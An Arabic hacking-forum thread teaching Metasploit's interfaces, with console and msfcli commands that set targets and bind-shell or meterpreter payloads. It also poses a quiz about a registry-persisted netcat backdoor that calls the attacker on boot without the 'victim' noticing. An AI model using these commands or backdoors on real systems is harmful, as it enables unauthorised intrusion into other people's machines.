![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
|
السلام عليكم ورحمه الله اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت وهي 1- msfconsole msfcli -2 msfgui -3 msfw eb -4 msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها . msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات . 1- msfconsole راح اشرح الاوامر المهمه 1- show الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all مثال : show exploits عرض الثغرات show payloads عرض payloads show encoders عرض encoders show nops عرض nops show auxiliary عرض auxiliary show options عرض الخيارات 2- use بمعنى استخدم الثغره او auxiliary كود:
use exploit/windows/smb/msdns_zone**** كود:
use auxiliary/scanner/smb/version ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء 3- info عرض معلومات الثغره مثال : كود:
info exploit/windows/smb/msdns_zone**** كود:
use exploit/windows/smb/msdns_zone**** info set -4 بمعنى ضع للمتغير قيمه مثال set rhost 192.168.1.3 set payload windows/shell_bind_tcp connect -5 مثل اداه النت كات exploit and run -6 exploit تستخدم لتشغيل الثغرات run يستخدم لتشغيل auxiliary back -7 العوده للوراء مثال : كود:
msf exploit(msdns_zone****) > back msf > نروح لطريقه استخدام الثغره استخدامها سهل ما تتعدا خمس اوامر كود:
اسم الثغره use show option ليتم عرض المتغيرات اسم المتغير set exploit show advanced show evasion ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك , show targets عرض الاهداف التي تشتغل الثغره عليها نروح للاداه الاخرى msfcli نروح لكيفيه الاستخدام استخدامها سهل جدا وعن طريق سطر واحد كود:
Usage: ./msfcli O = خيارات الثغره ِE = تشغيل الثغره P = عرض بايلود الخاصه مثال لاستغلال ثغره كود:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1 كود:
set rhost a.b.c.d set payload windows/**** rhost= payload= هذا الشرح كمختصر بأمكانك التطبيق انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه كانت عندي سلسله لكن طارت تابع التطبيق , ومن ثم يأتي وقت السؤال ملاحظه : اهم شيء التطبيق للثغره كود PHP:
بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم ا او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي وايضا ما ابي اخلي الضحيه يشك انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-) SiLv3r00t V4-team.com
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
المشاركة رقم: 2 | ||||||||||||
|
كل الشكر لك اخي رعش |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
مشكور على الموضوع جاري متابعة الدورة |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
مبدع اخي رعش |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
****ااااااااااااااااا يا اخى |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 6 | ||||||||||||
|
**** اخي على هل در س |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 7 | ||||||||||||
|
السلام عليكم |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 8 | ||||||||||||
|
جزاكم الله خيرا |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 66
|
|
|
00X
,
3bjo
,
adiesmadi
,
airami
,
AKBIROCK3
,
aloner
,
amr.elbomb
,
amrhakers
,
Anis Gladiator
,
aqm
,
aza
,
A£K93
,
مدمراليهود
,
العدامه22
,
dawaima
,
doubleali
,
DR.X
,
dzori
,
elmojahid
,
ExPLo!T_Dz
,
fire_jooh
,
hacoo0
,
hak4
,
hamza 12
,
حازومانى
,
حكمي
,
john23
,
khalil19000
,
lasbat-dz
,
loock
,
luop1980
,
M3GO
,
maaahs
,
MAFIA-DZ
,
MdMn HaCk3r
,
med-hackerdz
,
midofahmey
,
mimoon
,
mividalocka
,
mo3eth
,
Mr-didi
,
Mr.3Jr4M
,
Nassim0x09
,
okita0039
,
سجين الوطن
,
سردينة2009
,
raouf74
,
RaYm0n
,
S-japonia33
,
S1LV3rS3rf3r
,
SaBeR-Dz
,
Saif Al-Naar
,
saudi_hack
,
shadid
,
shapola
,
|
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| الدرس الثالث: ادوات الميتاسبلويت | ViRuS_Ra3cH | دورة الميتاسبلويت | SiLv3r00t | 6 | 30/01/2015 22:30 |
| الدرس الثامن : الدخول لعالم الميتاسبلويت ! | ViRuS_Ra3cH | دورة الميتاسبلويت | SiLv3r00t | 6 | 08/01/2014 14:33 |
| الدرس الخامس - التقسيم وحصر القيم | أحمد العرجان | دورة التــــشـــفـــــير | 7 | 08/12/2012 20:30 |
| الدرس الثاني: شرح الميتاسبلويت وملفاته | ViRuS_Ra3cH | دورة الميتاسبلويت | SiLv3r00t | 6 | 13/02/2011 21:30 |
| الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability) | ViRuS_Ra3cH | دورة تخطي الحماية للسيرفرات | Crazy_Hacker | 0 | 18/03/2010 01:48 |
![]() |
![]() |
![]() |